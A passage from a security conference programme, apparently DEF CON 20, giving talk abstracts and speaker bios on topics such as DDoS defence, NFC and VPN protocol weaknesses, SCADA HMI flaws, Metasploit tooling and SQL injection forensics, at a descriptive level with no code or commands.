timing-based technique in concert with TPM as a trustworthy timer,
so that network jitter is not an issue.
Xeno Kovah has over 379 years of
security experience. Xeno Kovah started programming when he was -6. Xeno Kovah
has been the CSO for all of the Fortune Top 33.3 companies. Xeno Kovah has written
17 of the top 10 best selling security books. Xeno Kovah wrote all of 29A, Phrack,
and Uninformed under various aliases. In Xanadu did Xeno Kovah a stately pleasure
dome decree. Look on his works, ye mighty, and despair.
Twitter: @OpenSecTraining
Corey Kallenberg Corey is a rootkit and trusted
computing researcher currently employed by the MITRE Corporation. In his spare time, Corey
summons the dark powers of Papa Legba to exploit memory corruption vulnerabilities and
bypass exploit mitigation schemes.
DDoS Black and White "Kungfu" Revealed
Anthony "Darkfloyd" Lai Security Researcher, Valkyrie-X Security Research Group (VXRL)
Tony "MT" Miu Researcher, VXRL
Kelvin "Captain" Wong Researcher, VXRL
Alan "Avenir" Chung Researcher, VXRL
Tony "MT" Miu Researcher, VXRL
Kelvin "Captain" Wong Researcher, VXRL
Alan "Avenir" Chung Researcher, VXRL
Enterprises currently dump millions of bucks to defense against DDoS,
some trading firms here are paying for fear to the DDoS attack from
China about 5K to 100K USD per day and InfoSec teams believe their
solutions are perfect already.
Are those controls effective and unbreakable? In the first part of the
presentation, we would like to show our studies and carry out over 10
types of DDoS test against various big firms and organizations to see
whether their defense is effective, showing how stupid and smart they
are. Various interesting case studies will be briefed :)
In the second part of the presentation, we will detail our proposed
defense model to against Application-Level attacks. We have already
checked with other vendors and researchers about our model, it is
still not yet deployed and hopefully we could put this as an open
source project in the future.
Hopefully, you will enjoy this fun session with us and learn
whether your organization could survive even under DDoS attack.
Anthony "Darkfloyd" Lai
focuses on reverse engineering and malware analysis as well as
penetration testing. His interest is always falling on CTF and analyzing
targeted attacks. He has spoken in Black Hat USA 2010, DEF CON 18 and
19, AVTokyo 2011, Hack In Taiwan 2010 and 2011 and Codegate 2012. His
most recent presentation at DEF CON was about APT Secrets in Asia.
Recently, he has worked with MT, Captain and Avenir on DDoS
research projects. Meanwhile, he is always studying targeted attacks
from mainland China and it would be fun for him to get another attack
perspective from these studies.
Twitter: @anthonation
Tony "MT" Miu has worked in an anti-DDoS company for over a
few years. He has expertise in network security and always needs to tackle new DDoS attacks against his company's
clients. The task is clearly critical. He knows lots of dark side of attacks and MT is the major leader of both DDoS
Kungfu and defense model projects.
Kevin "Captain" Wong works in law enforcement and deals with various
reported criminal cases about DDoS and network intrusion as well as computer forensics, he is the real frontline
investigator fighting with the criminals and suspects.
Alan "Avenir" Chung has more than 8 years working experience on Network Security.
He currently is working as a Security Consultant for a Professional Service provider. Alan specializes in Firewall,
IDS/IPS, network analysis, pen-test, etc. Alan’s research interests are Honeypots, Computer Forensics, Telecommunication etc.
NFC Hacking: The Easy Way
Eddie Lee Senior Security Researcher, Blackwing Intelligence
Until now, getting into NFC/RFID hacking required enthusiasts to buy special hardware and learn
about the underlying transfer protocols. No longer! NFCProxy is a new tool (being released at DEF CON 20) that allows you
to proxy RFID transactions using Android phones. NFCProxy can record and replay RFID transactions from the perspective of
the tag or the PCD (proximity coupling device). NFCProxy is an open source tool/framework that can be used to analyze
13.56?MHz RFID protocols and launch replay (and potentially man in the middle) attacks. You can even use NFCProxy as a
virtual wallet by storing previously scanned RFID enabled credit cards and replaying them later at a POS (point of sale)
terminal. No fancy equipment needed…just two NFC capable Android phones running ICS (one with a custom rom). Owning RFID
enabled credit cards just got easier!
Eddie Lee is a security researcher at Blackwing Intelligence. He specializes
in application security, but is an enthusiast of all things related to security. From exploiting buffer overflows to
building robots to messing with RFID, he just likes to figure out how things work (and how they break). Before Blackwing,
Eddie was a member of the Security Research Group at Fortify software where he helped develop methods to detect
vulnerabilities and attacks through static analysis and runtime analysis.
Eddie has previously spoken at DEF CON and is a core member of Digital Revelation -- a two-time DEF CON CTF 1st place team
Robots: You're Doing It Wrong 2
Katy Levinson Director of Development, Hacker Dojo
By popular demand, Defcon's angry little roboticist is back with more stories of
robot designs gone awry that make practical lessons on making better robots. Drinking will happen:
vodka-absconding scoundrels are not invited.
This talk will cover material assuming the average audience member is a relatively intelligent
coder with a high-school physics/math background and has seen linear algebra/calculus before.
The intent is to navigate people new to robotics around many lessons my teams and I
learned the "hard way," and to introduce enough vocabulary for a self-teaching
student to bridge the gap between amateur and novice professional robotics. It will not
cover why your Arduino doesn't work when you plugged your USB tx into your RS232 tx.
Katy Levinson is a jack-of-all-trades currently employed by Hacker Dojo, a
hackerspace in Mountain View California, where she herds cats and wrings them out for money. She was previously a
roboticist and the Software Team Lead at NASA Ames on the Lunar Micro Rover Project, and has also been an
infrastructure software engineer at Google. She briefly worked as a mercenary for a small VC firm and in
Hong Kong where she refereed political pissing matches. She survived 4 seasons of FIRST Robotics as a
team member, mentored an additional team, helped found five more and mentored them each through a full
competitive season. She has won many prestigious awards which you have neither heard of nor care about
and is a proud graduate of Worcester Polytechnic Institute.
Twitter: @katylevinson
Anonymous and the Online Fight for Justice
Amber Lyon Independent Investigative Journalist
Gabriella Coleman Chair in Scientific and Technological Literacy, McGill University, Department of Art History & Communication Studies
Marcia Hoffman Senior Staff Attorney, Electronic Frontier Foundation
Mercedes Haefer Student, UNLV
Jay Leiderman Attorney, Leiderman Devine LLP
Gráinne O’Neill Coordinator Anonlg Project, National Lawyers Guild
Gabriella Coleman Chair in Scientific and Technological Literacy, McGill University, Department of Art History & Communication Studies
Marcia Hoffman Senior Staff Attorney, Electronic Frontier Foundation
Mercedes Haefer Student, UNLV
Jay Leiderman Attorney, Leiderman Devine LLP
Gráinne O’Neill Coordinator Anonlg Project, National Lawyers Guild
How the media mischaracterizes, & portrays hackers.
IRL protest VS. online protest. Politically motivated prosecution. COINTELPRO.
The future of hacking and what law enforcement agencies plan to do about it
Amber Lyon is a three-time Emmy Award- winning
investigative journalist, photographer, and documentary filmmaker. Formerly of CNN, Amber
now works Independently to cover corporate corruption, human and environmental abuses,
revolutions, and hacktivists. While working for CNN, Amber worked to get more in-depth coverage
of Anonymous into the main stream media and was the lead reporter on CNN's inside
Anonymous special.
(https://www.youtube.com/watch?feature=player_embedded&v=pOmk-A4Av8Y)
Twitter: @amberlyon
http://www.amberlyonlive.com
Gabriella Coleman researches and teaches on the
politics of free software, hackers, the law, and digital activism. Her first book, “Coding
Freedom: The Aesthetics and the Ethics of Hacking” is forthcoming in November 2012 with
Princeton University Press and she is currently working on a new book on Anonymous
and digital activism.
Twitter: @BiellaColeman
http://gabriellacoleman.org
Marcia Hoffman is a senior staff attorney at
the Electronic Frontier Foundation, where she works on a broad range of digital civil
liberties issues including computer security, electronic privacy, and free expression.
She currently focuses on computer crime and EFF's Coders' Rights Project, which promotes
innovation and protects the rights of curious tinkerers and researchers in their
cutting-edge exploration of technology. Prior to joining EFF, Marcia was staff
counsel and director of the Open Government Project at the Electronic Privacy
Information Center (EPIC).
Twitter: @marciahoffman
https://www.eff.org/about/staff/marcia-hofmann
Mercedes Haefer In July 2011, Mercedes was indicted along with
13 others (dubbed the Anonymous 14) for allegedly conspiring to commit distributed denial of
service (DDoS) attacks against PayPal’s website as part of an alleged Anonymous Operation Payback. (allegedly)
Mercedes is enrolled as a sociology undergraduate at the University of Nevada and Las Vegas.
Twitter: @usagi_the_bunny
Jay Leiderman is a criminal defense lawyer at
Leiderman Devine LLP in Ventura, California. Among other cases involving hacktivism, Leiderman
is representing Christopher Doyon, alleged member of Anonymous known as Commander X.
(Doyon has fled to Canada using what he referred to as "an underground railroad and
network of safe houses"). Leiderman has said he knew Doyon was frustrated by the
condition of his release, which included being banned from accessing Twitter or IRC
chats. (currently the "Anon 14" have been granted their Twitter rights). As a
veteran trial attorney who spends most of his time in court defending the accused,
and as one of the few attorneys that has actually represented an alleged member of
Anonymous accused of a federal hacking crime, Leiderman brings a unique perspective
to the defense of purported members of Anonymous.
Twitter: @leidermandevine
http://www.leidermandevine.com/
Gráinne O’Neill is a the Director of
the MyGideon project at the Charles Hamilton Houston Institute for Race and Justice at Harvard
Law School. She is also a board member of the National Lawyers Guild and in that role Coordinates
the Anonlg Project. Anonlg is a national network of NLG attorneys who provide defense to targeted
hacktivists. She received her JD from Columbia Law School where she was the Managing Editor of
the Jailhouse Lawyers Manual, and has a degree in computer science from Cornell University.
(http://anonlg.com)
Twitter: @grainne
http://www.nlg.org/leadership/grainne-oneill/
OPFOR 4Ever
Tim Maletic Senior Security
Consultant,Trustwave SpiderLabs
Christopher Pogue Managing Consultant, Trustwave SpiderLabs
Christopher Pogue Managing Consultant, Trustwave SpiderLabs
Training utilizing Opposing Forces, or OPFOR, is an exercise focused on
improving detection and response through the principle of "train as you
fight." We will demonstrate how we have applied OPFOR to build a
continuous feedback loop between penetration testing and incident
response. In OPFOR 4Ever, the defense trains the offense just as much
as the offense trains the defense, and the exercise has no end date.
Come see us demonstrate some attacks as seen from the point of view of
the defender as well as the attacker. You can then watch the replay as
we use OPFOR principles to evolve these attacks to a form more suitable
for real-world penetration testing, pentesting that strives to better
simulate what blackhats actually do. This of course raises the bar for
incident responders. Evolve or die.
Tim Maletic is a Senior Security Consultant within the Penetration
Testing team at Trustwave's SpiderLabs. Tim has been working in IT since
the birth of the web, and has been focused full-time on information
security since 2001. Prior to joining Trustwave, Tim held positions as
Senior UNIX Engineer, Senior Security Engineer, and Information Security
Officer.
Christopher Pogue is the Managing Consultant of the SpiderLabs Incident
Response and Digital Forensics team. Having served as a US Army Signal
Corps Warrant Officer, he worked on digital forensic investigations and
as Cyber Security Instructor. Pogue joined the IBM Internet Security
Systems (ISS) X-Force after leaving the military. As a Penetration
Tester and Forensic Investigator with IBM, he performed over 300
penetration tests and 50 investigations. In his role with SpiderLabs,
Pogue leads the team that performs investigations all over the United
States, Central and South America, and the Caribbean Islands. He also
assists local, state, and federal law enforcement agencies with cases
involving digital media.
Weaponizing the Windows API with Metasploit’s Railgun
David “thelightcosine” Maloney Software Engineer, Metasploit
– Rapid7
No part of the Metasploit Framework has been shrouded in more mystery
and confusion than the Railgun extension. Railgun is one of the most powerful
tools in the Metasploit arsenal when it comes to Post Exploitation. In this
talk we will examine what Railgun is, and how we can use it to turn Windows
completely against itself by weaponizing the Windows API libraries. We will
demystify Railgun by explaining exactly how it works under the covers and
how you can use it to create powerful post modules.
David “thelightcosine” Maloney is a Software Engineer on the Metasploit Team
at Rapid7. Before joining the team, he was a frequent contributor to the open
source side of the project. As a contributor he specialized in Post Exploitation.
Before Rapid7 he was a Penetration Tester, most recently for Time Warner
Cable. David is also one of the founders of Hackerspace Charlotte in Charlotte,
North Carolina.
Twitter: @thelightcosine
Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2
Moxie Marlinspike
David Hulton
Marsh Ray
MS-CHAPv2 is an authentication and key negotiation protocol
that, while old and battered, is still unfortunately deployed quite
widely. It underpins almost all PPTP VPN services, and is relied upon
by many WPA2 Enterprise wireless deployments. We will release tools
that definitively break the protocol, allowing anyone to affordably
decrypt any PPTP VPN traffic or CHAPv2-based WPA2 handshake with a 100%
success rate.
Moxie Marlinspike was the CTO and co-founder of Whisper
Systems, is a member of the Institute For Disruptive Studies, runs a
cloud-based password cracking service, is the original developer of
sslstrip and sslsniff, manages the GoogleSharing targeted anonymity
service, is the creator of the Convergence SSL authenticity system, and
is the co-creator of the TACK certificate pinning protocol. His tools
have been featured in many publications, including CNN, Forbes, The Wall
Street Journal, and The New York Times. He is also the author of the
sailing film "Hold Fast."
SCADA HMI and Microsoft Bob: Modern Authentication Flaws With a 90's Flavor
Wesley McGrew Research Associate and Lecturer
Critical Infrastructure Protection Center, National Forensics Training Center, Mississippi State University
Critical Infrastructure Protection Center, National Forensics Training Center, Mississippi State University
SCADA HMI software provides a "control panel" interface to SCADA/ICS systems, allowing system
operators and engineers the capability to visually monitor and make changes to parameters in the system. Many
HMI packages provide the ability to authenticate users, to allow access to dangerous or sensitive controls and
data to specific users, while restricting other users to observation or less sensitive areas of the system.
Microsoft Bob was a failed Microsoft project from 1995: an attempt to make computers easy for end-users by providing
a non-technical captive interface of "rooms" that users could move around, use the launch programs, and store files.
Cartoon guides helped users with every step of the way. Thanks to an overly-helpful cartoon dog that would offer to
change your password for you if you forgot it, it's frequently used as an example of bad security design choices.
In this presentation, Wesley will point out the similarities and differences between Microsoft Bob and
SCADA HMI software, and demonstrate previously unpublished vulnerabilities in the HMI systems that are very
reminiscent of the problems with Microsoft Bob (which will also be demonstrated!). For penetration testers,
the techniques used to quickly identify these vulnerabilities will be discussed, as well as mitigations for
those who have to defend such systems.
Robert McGrew is currently a lecturer and
researcher at Mississippi State University's National Forensics Training Center, which provides free
digital forensics training to law enforcement and wounded veterans. He has interests in both penetration
testing and digital forensics, resulting in some interesting combinations of the two. He has written tools
useful to both fields (NBNSpoof, msramdmp, GooSweep), and tries to stay involved and interactive with the
online infosec community. He is currently expanding and exposing the rest of the security community to the
SCADA HMI research he began with the release of user authentication vulnerabilities in the iFIX HMI
product.
Twitter: @McGrewSecurity
http://mcgrewsecurity.com
Don't Stand So Close To Me: An Analysis of the NFC Attack Surface
Charlie Miller Principal Research Consultant, Accuvant Labs
Near Field Communication (NFC) has been used in mobile devices in some countries for a while and is now emerging
on devices in use in the United States. This technology allows NFC enabled devices to communicate with each other within close range,
typically a few centimeters. It is being rolled out as a way to make payments, by using the mobile device to communicate credit card
information to an NFC enabled terminal. It is a new, cool, technology. But as with the introduction of any new technology, the question
must be asked what kind of impact the inclusion of this new functionality has on the attack surface of mobile devices. In this paper,
we explore this question by introducing NFC and its associated protocols. Next we describe how to fuzz the NFC protocol stack for two
devices as well as our results. Then we see for these devices what software is built on top of the NFC stack. It turns out that through
NFC, using technologies like Android Beam or NDEF content sharing, one can make some phones parse images, videos, contacts, office
documents, even open up web pages in the browser, all without user interaction. In some cases, it is even possible to completely
take over control of the phone via NFC, including stealing photos, contacts, even sending text messages and making phone calls.
So next time you present your phone to pay for your cab, be aware you might have just gotten owned.
Charlie Miller is Principal Research Consultant at Accuvant Labs. He was the first
with a public remote exploit for both the iPhone and the G1 Android phone. He is a four time winner of the CanSecWest Pwn2Own
competition. He has authored three information security books and holds a PhD from the University of Notre Dame. He is
currently being held in a maximum security prison in Cupertino, but hopes to be released soon
for good behavior.
Twitter: @0xcharlie
How to Hack VMware vCenter Server in 60 Seconds
Alexander Minozhenko Senior Penetration Tester, ERPScan
This talk will discuss some ways to gain control over the virtual infrastructure through vCenter's services. I will describe a few non-dangerous bugs (they were 0-days when we found them), but if we can use all of them together, we will get administrative access to vCenter which means to the whole virtual network.
Alexander Minozhenko works in the leading IT security company ERPScan as penetration tester. Alexander graduated in 2012 from St. Petersburg National Research University ITMO, faculty of computer science. Also he likes to participate in CTF competition.
Twitter: @al3xmin
DEF CON Comedy Jam V, V for Vendetta
David Mortman Chief Security Architect, enStratus
Rich Mogull Securosis, @rmogull
Chris Hoff Rational Security, @beaker
Dave Maynor Errata, @donicer
Larry Pesce pauldotcom.com, @haxorthematrix
James Arlen Liquid Matrix, @myrcurial
Robert David Graham Errata Security, @ErrataRob
You know you can't stay away! The most talked about panel at DEF CON! Nearly two hours of non-stop FAIL.
Come hear some of the loudest mouths in the industry talk about the epic security failures of the last year. So much fail,
you'll need the food cooked on stage to survive. Nothing is sacred not even each other. This years fail includes cloud,
mobile and apt to name just a few topics. If that's not enough, we'll also be making crepes on stage. Over the last two
years, we've raised over $1,500 for the EFF, let's see how much we can do this year....
David Mortman is the Chief Security Architect at enStratus and is a
Contributing Analyst at Securosis. Before enStratus, he ran operations and security for C3. Formerly the Chief
Information Security Officer for Siebel Systems, Inc., Previously, Mr. Mortman was Manager of IT Security at
Network Associates. Mr. Mortman has also been a regular panelist and speaker at RSA, Black Hat, DEF CON and Source
Boston as well. Mr. Mortman sits on a variety of advisory boards including Qualys. He holds a BS in Chemistry from
the University of Chicago. David writes for Securosis, Emergent Chaos and the New School blogs. David was an editor
for the 2nd Ed of the Cloud Security Alliance Guidance.
Rich Mogull is a recovering industry analyst and the
C-something-or-other of Securosis. Deep in his past he worked as a systems and network administrator,
before moving on to a web developer and then focusing on security. Previous Fail panel exploits include
impersonating an aspiring money mule, running a robot off the stage, some cool wireless stuff that
surprisingly worked, and mucking with cloud APIs.
He promises to keep his pants on this year. He dislikes hippies and hipsters.
Twitter: @rmogull
Chris Hoff is a senior director at Juniper Networks where he serves as
chief security architect. He was previously director of cloud &
virtualization solutions at Cisco Systems where he focused on virtualization
and cloud computing security, spending most of his time interacting with
global enterprises and service providers, governments, and the defense and
intelligence communities. Prior to Cisco, he was Unisys Corporation’s chief
security architect, served as Crossbeam Systems' chief security strategist,
was the CISO and director of enterprise security at a $25 billion financial
services company and was founder/CTO of a national security consultancy
amongst other startup endeavors.
Hoff is interviewed regularly by the media and press, is a featured guest on
numerous podcasts and has keynoted and presented at numerous high-profile
security conferences including Black Hat, DEF CON, Microsoft's Bluehat, RSA,
Source, SecTor, FIRST, SANS and Troopers.
Hoff is a founding member and technical advisor to the Cloud Security
Alliance, founder of the CloudAudit project and the HacKid conference and
blogs at http://www.rationalsurvivability.com/blog.
He serves on numerous advisory boards.
Hoff was a CISSP, CISA, CISM and NSA IAM but he spends the AMF's on coffee
now, instead. He was twice nominated as the Information Security Executive
of the Year and won the Security 7 award in Financial Services in 2005.
Hoff is a 2010, 2011 Microsoft MVP (Security) and a 2010 VMware vExpert.
Dave Maynor is a founder of Errata Security and serves as the Chief Technical
Officer. Mr. Maynor is responsible for day-to-day technical decisions of Errata Security and also employs a strong
background in reverse engineering and exploit development to produce Hacker Eye View reports. Mr. Maynor has
previously been the Senior Researcher for Secureworks and a research engineer with the ISS Xforce R&D team where
his primary responsibilities included reverse engineering high risk applications, researching new evasion
techniques for security tools, and researching new threats before they become widespread. Before ISS Maynor
spent the 3 years at Georgia Institute of Technology (GaTech), with the last two years as a part of the
information security group as an application developer to help make the sheer size and magnitude of security
incidents on campus manageable. Before that Maynor contracted with a variety of different companies in a
widespread of industries ranging from digital TV development to protection of top 25 websites to security
consulting and penetration testing to online banking and ISPs.
Larry Pesce is a penetration tester with NWN Corporation's
NProtect team. He spends his days hacking in his underwear, playing with various radios and often
burning his fingertips with a soldering iron, while not hanging out with the pauldotcom.com crew.
James Arlen sometimes known as Myrcurial, is a security consultant
usually found in tall buildings wearing a suit, founder of the Think|Haus hackerspace, contributing analyst for
Securosis, columnist at Liquidmatrix Security Digest, Infosec geek, hacker, social activist, author, speaker,
and parent. He’s been at this security game for more than 15 years and loves blinky lights and shiny things.
Robert David Graham created BlackICE Defender (one of the first personal firewalls)
and BlackICE Guard (first IPS). Developed various attack tools and methods, like "sidejacking", a component
of most attack toolkits. Expert in SCADA hacking.
Cortana: Rise of the Automated Red Team
Raphael Mudge Principal, Strategic Cyber LLC
Do you ever wish that you could clone yourself during a penetration test?
Meet Cortana, a new scripting language to automate Metasploit and extend Armitage. Cortana is a penetration tester's scripting
language inspired by scriptable IRC clients and bots. Its purpose is two-fold. You may create long running bots that simulate
virtual red team members, hacking side-by-side with you. You may also use it to extend the Armitage GUI for Metasploit. To
prevent self-aware bots from taking over the world, Cortana has blanket safety features to provide positive control when enabled.
This talk will introduce Cortana, the automation gap it fills, and its capabilities to you. You will see several demonstrations
of Cortana in action and get a flavor of what's now possible. Cortana was developed through DARPA's Cyber Fast Track program.
Raphael Mudge is the founder of Strategic Cyber LLC, a Washington, DC based
company that creates software for red teams. He created Armitage for Metasploit, the Sleep programming language, and the
IRC client jIRCii. Previously, Raphael worked as a security researcher for the US Air Force, a penetration tester, and he
even invented a grammar checker that was sold to Automattic. His work has appeared in Hakin9, USENIX ;login:, Dr. Dobb's
Journal, on the cover of the Linux Journal, and the Fox sitcom Breaking In. Raphael regularly speaks on security topics
and provides red team support to many cyber defense competitions.
Twitter: @armitagehacker
http://www.fastandeasyhacking.com/
Making Sense of Static - New Tools for Hacking GPS
Fergus Noble
Colin Beighley
Colin Beighley
GPS receivers are a part of everyday life, you probably own several already and use them
everyday, in your phone or in your car. Its really pretty amazing that you can find your position anywhere on
Earth with just a small device you can fit in your pocket, but how does it actually work? In this talk we would
like to guide you through the amazing technical journey that makes this possible and to open it up to the hacker
community to explore.
Current GPS receivers found in mobile phones etc. are capable of about 5m accuracy but high-end receivers costing
thousands can get this down to centimeters just using some more sophisticated algorithms and processing. This really
opens up a lot of opportunities for UAVs and Quadcopters (and other applications we haven’t even thought of - what
would you use it for?) and we would like to see this level of performance available in an open-source system.
We have developed and would like to share with you a new set of tools which we hope will make GPS accessible to hackers
and experimenters; a library, libswiftnav, which contains a complete toolset for building a GPS receiver, and Piksi, a
stand-alone hardware platform to run it on. The prototype is already very capable - we can’t wait to see what you can
come up with.
Fergus Noble graduated in 2011 with an MSc. in Physics from the University of
Cambridge, UK. Whilst at Cambridge he spent most of his spare time working on an 100km amateur rocket attempt which led
to his frustration with available GPS systems. After graduating, he moved to California to work for Joby Energy on GPS
systems for high-altitude wind turbines before co-founding Swift Navigation with Colin Beighley and Henry Hallam to work
on a new open-source GPS receiver. He is also a co-maintainer of libopencm3, an open-source peripheral library for
ARM Cortex-M based microcontrollers and creator of Plot-o-matic, an open-source tool for quickly visualising
real-time data streams.
https://github.com/fnoble
Colin Beighley graduated from the University of California at Santa Cruz in 2010 with a BS in Electrical Engineering. He worked at Joby Energy in Bonny Doon, California, before co-founding Swift Navigation with fellow GPS hackers Fergus Noble and Henry Hallam. He is the creator of softgnss_python, an open-source GPS/GNSS post-processing library.
SQL ReInjector - Automated Exfiltrated Data Identification
Jason A. Novak Assistant Director, Digital Forensics; Stroz Friedberg, LLC
Andrea (Drea) London Digital Forensic Examiner; Stroz Friedberg, LLC
Andrea (Drea) London Digital Forensic Examiner; Stroz Friedberg, LLC
In 2011, SQL injections became front page news as ever more high profile companies were victims of
automated SQL injection attacks. Responders spent countless hours looking at values in log files like "0x31303235343830303536"
trying to figure out what was being exfiltrated by whom. Incident response costs skyrocketed while the cost of attacking fell.
This presentation will debut SQL ReInjector, a tool for the rapid assessment of logs from SQL injection attacks to determine
what data was exfiltrated.
When responding to an SQL injection attack, responders have to determine what was exfiltrated by manually parsing the web
server logs from the victimized host. This is a time consuming process that requires a significant amount of a responder’s
time. Moreover, manual replay of the SQL injection does not account for system level discrepancies in how queries are
executed by the system – running SQL against a SQL server directly doesn’t account for the behavior of any intermediary
systems – e.g. any application layer logic or nuances in how the web application and database server interact.
SQL ReInjector uses the log files from the machine that has been subject to a SQL injection attack to replay the attack
against the server (or a virtualized forensic image thereof) and captures the data returned by the SQL injection web site
requests, reducing the amount of time responders have to spend looking at web server logs and allows for responders to
recreate the data exfiltrated through a SQL injection attack.
Jason A. Novak is an Assistant Director of Digital Forensics in
Stroz Friedberg's Chicago office. At Stroz Friedberg, Mr. Novak has been lead examiner in a wide range of
cases involving digital forensics, incident response, application testing, source code analysis, and data analytics,
and has developed numerous tools to expedite the firm's analysis and response capabilities. The proprietary tools
developed by Mr. Novak have included: an anti-money laundering data analytics platform and tools to process
electronically stored information to respond to forensic and electronic discovery requests. As a co-writer of
the Google Street View report, Mr. Novak analyzed the source code to gstumbler, the WiFi device geolocation
application used by Google as part of the Street View project, and documented its structure and functionality
in a publicly released report; Mr. Novak has responded to inquiries about the report from domestic and foreign
regulators.
Twitter: @strozfriedberg
Andrea (Drea) London is a Digital Forensic Examiner in Stroz Friedberg's
Dallas office. At Stroz Friedberg, Ms. London acquires and examines digital evidence from laptops, desktops and
mobile phones in support of legal proceedings, criminal matters, and/or corporate investigations. Additionally she
is responsible for implementing large-scale, end-to-end electronic discovery for both civil and criminal litigation.
Ms. London previously held positions at Arsenal Security Group and IBM’s Internet Security Systems Emergency Response
Team. At Arsenal, Ms. London was an integral part of the company’s immediate response team for worldwide cyber security
incidents. During this time she completed and has maintained certification as a Payment Application Qualified Security
Assessor (PA QSA), Payment Card Industry (PCI QSA), and PCI Forensic Investigators (PFI), one of the first appointed by
the PCI Council. At IBM, she acted as an official Quality Incident Response Assessor (QIRA) reporting PCI breaches to
major card brands. Prior to her work for IBM, Ms. London was with the Air Force Office of Special Investigations (AFOSI),
where she was one of two Airmen chosen for special duty assignment at the Defense Cyber Crime Center, and where she was
tasked with testing and evaluating forensic software and hardware for the Center.
Meet the EFF
Kurt Opsahl
Senior Staff Attorney, Electronic Frontier Foundation
Marcia Hofmann EFF Senior Staff Attorney
Hanni Fakhouri EFF Staff Attorney
Peter Eckersley EFF Director of Technology Projects
Eva Galperin International Freedom of Expression Coordinator
Trevor Timm Activist
Marcia Hofmann EFF Senior Staff Attorney
Hanni Fakhouri EFF Staff Attorney
Peter Eckersley EFF Director of Technology Projects
Eva Galperin International Freedom of Expression Coordinator
Trevor Timm Activist
Get the latest information about how the law is racing to
catch up with technological change from staffers at the Electronic Frontier Foundation,
the nation’s premiere digital civil liberties group fighting for freedom and privacy in
the computer age. This session will include updates on current EFF issues such as
surveillance online and fighting efforts to use intellectual property claims to shut
down free speech and halt innovation, discussion of our technology project to
protect privacy and speech online, updates on cases and legislation affecting
security research, and much more. Half the session will be given over to
question-and-answer, so it's your chance to ask EFF questions about the
law and technology issues that are important to you.
Kurt Opsahl is a Senior Staff Attorney
with the Electronic Frontier Foundation focusing on civil liberties, free speech
and privacy law. Opsahl has counseled numerous computer security researchers on
their rights to conduct and discuss research. Before joining EFF, Opsahl worked
at Perkins Coie, where he represented technology clients with respect to intellectual
property, privacy, defamation, and other online liability matters, including working
on Kelly v. Arribasoft, MGM v. Grokster and CoStar v. LoopNet. Prior to Perkins, Opsahl
was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of
Information Management & Systems. Opsahl received his law degree from Boalt Hall,
and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic
Media and Privacy Law Handbook.” In 2007, Opsahl was named as one of
the “Attorneys of the Year” by California Lawyer magazine for his work on
the O'Grady v. Superior Court appeal, which established the reporter’s privilege
for online journalists.
Twitter: @kurtopsahl, @eff
Facebook: eff
https://www.eff/org
Marcia Hofmann is a senior staff attorney
at the Electronic Frontier Foundation, where she focuses on computer crime and security,
electronic privacy, free expression, and other digital civil liberties issues. Prior to
joining EFF, Marcia was staff counsel and director of the Open Government Project at
the Electronic Privacy Information Center (EPIC).
Hanni Fakhouri is a Staff Attorney with the Electronic
Frontier Foundation focusing on the intersection of technology and criminal law within the Coders
Rights Project. Prior to joining EFF, Hanni worked as a federal public defender in San Diego.
In less than four years, he tried fourteen felony jury and bench trials and argued before the
Ninth Circuit Court of Appeals four times, winning three reversals, including a published
reversal in U.S. v. Sandoval-Gonzalez. He also served as a copy editor for the 2010 edition
of Defending a Federal Criminal Case. While in law school, Hanni worked at the federal public
defender's office in Sacramento, where he obtained acquittals in one jury trial and two bench
trials. Hanni is a graduate of UC Berkeley, where he received two degrees, including a honors
degree in history, and Pacific McGeorge School of Law, where he was elected to the Order of
Barristers for his excellence in written and oral advocacy. Hanni is a member of the National
Association of Criminal Defense Lawyers.
Peter Eckersley is Technology Projects Director
for the Electronic Frontier Foundation. He keeps his eyes peeled for technologies that, by
accident or design, pose a risk to computer users' freedoms—and then looks for ways to fix
them. He explains gadgets to lawyers, and lawyers to gadgets. Peter's work at EFF has
included privacy and security projects such as Panopticlick, HTTPS Everywhere, SSDI,
and the SSL Observatory; and running the first controlled tests to confirm that Comcast
was using forged reset packets to interfere with P2P protocols.
Eva Galperin is EFF's International Freedom of Expression
Coordinator, and has been instrumental in highlighting government malware designed to spy upon activists
around the world. A lifelong geek, Eva misspent her youth working as a Systems Administrator all
over Silicon Valley. Since then, she has seen the error of her ways and earned degrees in Political
Science and International Relations from SFSU. She comes to EFF from the US-China Policy Institute,
where she researched Chinese energy policy, helped to organize conferences, and attempted to make
use of her rudimentary Mandarin skills.
Trevor Timm is an activist at the
Electronic Frontier Foundation. He specializes in free speech issues and government
transparency. Before joining the EFF, Trevor helped the longtime General Counsel of
The New York Times, James Goodale, write a book on the First Amendment. He has
also worked for the former President of the ACLU and at The New Yorker. He
graduated from Northeastern University and has a J.D. from New York Law School.
The End of the PSTN As You Know It
Jason Ostrom Security Researcher, VIPER Lab (Voice over IP Exploit Research), Avaya, Inc.
Karl Feinauer Vulnerability Research Software Engineer, VIPER Lab
William Borskey Senior Security Consultant, VIPER Lab
Karl Feinauer Vulnerability Research Software Engineer, VIPER Lab
William Borskey Senior Security Consultant, VIPER Lab
The PSTN as you know it is changing. In March of 2012, the NSA announced "Project Fishbowl", a reference architecture for secure mobility VoIP usage on smartphones using WiFi or 3GPP networks. At the same time, mobile carriers in the US (seemingly) ensure that subscribers must purchase voice plans on their smartphones and can't opt for data only plans - which curtails a compelling option of purchasing a smartphone for data only usage, such as VoIP. Other mysterious clues abound. Since the mid-to-late 90s, users have been able to host their own web and email servers using open standards and DNS for advertisements, peering directly between domains and systems. At the same time, since the early 2000s, the technology and protocols have existed for enabling direct VoIP peering between enterprises, bypassing the PSTN, using DNS SRV records and ENUM - the same way we've been using DNS for HTTP and SMTP for years. But why is this seemingly attractive option for cost savings and collaboration not more widely adopted? Surely this is the way VoIP was meant to be used? Or isn't it?
In this talk, we will explore the so-called market buzz of "UC Federation". Rather, we will kick this term to the bit bucket, and present an overview of how the industry is deploying these solutions technically. We will take a closer look at the security of being able to use UC between organizations, advertised using DNS, the same way that companies use UC internally for VoIP, HD Video, data sharing, IM & Presence, and collaboration applications. This talk is divided into three sections.
First, we'll share our research on the state of public SIP peering using DNS SRV. Is SIP peering proliferating? How? What does it mean? Using a PoC research tool, we'll look at some initial data we've found, in order to plot the increase of peering using DNS SRV records for SIP service location advertisement.
